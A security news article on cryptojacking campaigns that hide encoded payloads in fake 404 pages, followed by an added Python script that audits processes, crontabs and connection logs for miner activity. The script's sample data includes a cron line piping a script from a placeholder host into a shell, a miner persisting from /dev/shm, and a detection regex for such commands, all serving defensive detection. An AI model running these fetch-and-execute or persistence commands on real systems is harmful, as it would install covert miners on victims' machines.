In recent months, several investigations have detected a new trend in the use of 404 error pages to distribute malware, particularly on Linux and Windows systems. The method lets attackers hide payloads in seemingly innocuous pages, which makes them difficult to detect with conventional web analysis and filtering systems.
Manipulated error pages have become an effective tool for launching cryptojacking campaigns and other threats, exploiting configuration flaws in Internet-exposed servers and services. The technique is an additional challenge for security teams because the malicious content is hidden inside ordinary HTML tags and goes unnoticed by most static scanners.
How infection works through modified 404 pages
The core of these campaigns is usually a loader that requests fake error pages from attacker-controlled domains. Hidden in custom tags within the page's own markup is a Base64-encoded block that is decoded and executed in the victim system's memory, which makes the intrusion very hard to detect for conventional antivirus software that scans the disk for suspicious files.
On Linux, the infection begins with a simple command that downloads and executes a script from a remote server. The script removes competing miners from the machine, deletes some logs to hinder forensic analysis and, if it has root privileges, tunes certain system parameters to increase mining throughput. After this preparation, the compromised system runs a dedicated binary, often disguised as a legitimate process, that connects to the attackers' servers and mines cryptocurrency continuously.
On Windows, attackers use utilities such as certutil or Invoke-WebRequest to download the malware, drop it in publicly accessible locations and inject it into seemingly harmless processes. Shortly afterwards the original file is deleted to remove traces, while the miner stays active in the background and persists across system reboots.
Expansion: Vulnerable web servers and databases
This threat does not affect only individual computers. A substantial share of recent attacks start from compromised web servers, such as those running Tomcat, or from misconfigured cloud services. The criminals exploit weak credentials or exposed PostgreSQL databases to upload their malware and then use the server itself as a launch pad against other devices on the network.
In fact, a significant number of victims are companies whose monitoring dashboards show nothing more than a sudden rise in energy consumption and degraded performance, the usual symptoms of hardware being used to mine cryptocurrency covertly.
Concealment and persistence techniques
One of the most worrying aspects of these campaigns is the sophistication of their concealment mechanisms. The malware disguises itself as a legitimate process (using names similar to those of system components) and schedules periodic tasks, such as cron jobs on Linux or entries in the Windows registry, to ensure that the miner is restarted automatically if the user or security software stops it.
This approach allows attackers to keep control of the device for long periods without raising suspicion, while the financial losses, from both power consumption and lost productivity, accumulate silently.
To defend against these threats, administrators and users should review their system configurations regularly. It is advisable to shut down unnecessary services and databases and to analyze traffic for atypical behavior, such as repeated connections to unknown domains or unusual spikes in CPU usage.
Proactive monitoring and the use of specialized tools that inspect memory and running processes are essential to detect and neutralize these attacks, which increasingly rely on subtler and more advanced techniques to go unnoticed.
The use of error pages as an attack vector shows how cybercriminals keep refining their strategies to exploit any weakness in Linux and Windows systems. Maintaining an active defensive posture, applying security patches and limiting the exposure of critical services to the Internet are essential for reducing the risk and containing the impact of these silent infections.
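The following Python script is an added example, not code from the article, showing the Linux host-side checks that the persistence section and the two defensive paragraphs above call for: process names that mimic system components but run from temporary directories, cron entries that download and pipe into a shell, per-process CPU spikes, and repeated connections to hosts outside an allow list. The `ps` and crontab samples, the connection-log format (timestamp, source, destination:port, host), the thresholds and the directory lists are constructed assumptions; Windows registry persistence is not covered here.

```python
import re
from collections import Counter
from posixpath import basename, dirname

# Thresholds and path lists are assumptions chosen for this example.
CPU_THRESHOLD = 80.0                                  # percent, per process
SUSPICIOUS_DIRS = ("/tmp", "/dev/shm", "/var/tmp")    # miners are often dropped here
TRUSTED_DIRS = ("/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec", "/bin", "/sbin", "/lib")
SYSTEM_LOOKALIKES = ("kworker", "kthreadd", "systemd", "sshd", "crond", "dbus")
DOWNLOAD_PIPE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def audit_processes(ps_output: str) -> list[dict]:
    """Flag suspicious processes in `ps -eo pid,pcpu,args --no-headers` output."""
    findings = []
    for line in ps_output.strip().splitlines():
        pid, cpu, args = line.split(None, 2)
        exe = args.split()[0]
        reasons = []
        if float(cpu) >= CPU_THRESHOLD:
            reasons.append("high_cpu")
        if not exe.startswith("["):       # real kernel threads show as [name] and have no path
            exe_dir, name = dirname(exe), basename(exe)
            if exe_dir.startswith(SUSPICIOUS_DIRS):
                reasons.append("runs_from_tmp")
            if name.startswith(SYSTEM_LOOKALIKES) and not exe_dir.startswith(TRUSTED_DIRS):
                reasons.append("system_name_lookalike")
        if reasons:
            findings.append({"pid": int(pid), "exe": exe, "reasons": reasons})
    return findings


def audit_crontab(crontab: str) -> list[dict]:
    """Flag crontab lines that fetch-and-execute or run from temporary directories."""
    findings = []
    for line in crontab.strip().splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @hourly, ...
            schedule, command = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            schedule, command = " ".join(fields[:5]), fields[5]
        reasons = []
        if DOWNLOAD_PIPE.search(command):
            reasons.append("download_and_pipe_to_shell")
        if any(tok.startswith(SUSPICIOUS_DIRS) for tok in command.split()):
            reasons.append("runs_from_tmp")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


def repeated_unknown_destinations(conn_log: str, known_hosts: set, min_hits: int = 3) -> list[dict]:
    """Count connections per destination host (lines: timestamp src dst:port host)."""
    hits = Counter()
    for line in conn_log.strip().splitlines():
        _ts, _src, _dst, host = line.split()
        if host not in known_hosts:
            hits[host] += 1
    return [{"host": h, "connections": n} for h, n in hits.most_common() if n >= min_hits]


# Constructed samples; the pool and CDN hosts use the reserved .invalid TLD.
SAMPLE_PS = """\
  412  0.0 /usr/lib/systemd/systemd --user
  873  0.1 /usr/sbin/sshd -D
 1502 97.3 /dev/shm/.x/kworkerds -o stratum+tcp://pool.example.invalid:3333
 1610  0.0 [kworker/u8:2]
"""
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://cdn.example.invalid/s.sh | sh
@reboot /dev/shm/.x/kworkerds
"""
SAMPLE_CONN_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 203.0.113.7:3333 pool.example.invalid
2024-05-01T10:00:30Z 10.0.0.5 203.0.113.7:3333 pool.example.invalid
2024-05-01T10:01:00Z 10.0.0.5 203.0.113.7:3333 pool.example.invalid
2024-05-01T10:01:05Z 10.0.0.5 198.51.100.10:443 updates.example.org
"""
KNOWN_HOSTS = {"updates.example.org"}

if __name__ == "__main__":
    for finding in (audit_processes(SAMPLE_PS) + audit_crontab(SAMPLE_CRONTAB)
                    + repeated_unknown_destinations(SAMPLE_CONN_LOG, KNOWN_HOSTS)):
        print(finding)
```

Each check on its own produces noise (a build server legitimately pegs a CPU; an admin may run a one-off `curl | sh`), which is why the findings carry a list of reasons rather than a verdict: a process that trips all three process rules, or a cron line that both fetches from an unknown host and executes from `/dev/shm`, is what deserves a memory inspection first.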